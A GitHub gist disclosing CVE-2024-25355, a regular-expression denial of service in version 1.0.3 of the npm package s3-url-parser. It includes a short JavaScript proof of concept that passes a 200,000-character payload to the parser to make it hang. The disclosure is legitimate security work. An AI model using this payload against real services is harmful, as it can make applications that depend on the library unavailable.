Skip to content

Instantly share code, notes, and snippets.

@6en6ar
Created April 29, 2024 10:38
Show Gist options
  • Save 6en6ar/a4977866c59cbcfc716f0f2717b812bf to your computer and use it in GitHub Desktop.
Save 6en6ar/a4977866c59cbcfc716f0f2717b812bf to your computer and use it in GitHub Desktop.
Public disclosure for a security issue inside s3-url-parser library
Product: https://www.npmjs.com/package/s3-url-parser
Version: 1.0.3
Vulnerability type: Denial of Service
CVE ID: CVE-2024-25355
The regexes defined on lines 7. , 17. and 27. inside https://github.com/AntonioRecaldeRusso/s3-url-parser/blob/master/index.js
are vulnerable to regex denial of service when a long input is provided resulting in a crash.
I've managed to reproduce it with this code:
import s3ParseUrl from 's3-url-parser';
console.time('[ + ] Time passed -> ');
var payload = '/g ' + ':'.repeat(199999) + ':/'
const sampleUrl = "http://s3mamazonawsocom/" + payload;
const { bucket, region, key } = s3ParseUrl(sampleUrl);
console.log(sampleUrl);
console.timeEnd('[ + ] Time passed -> ');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment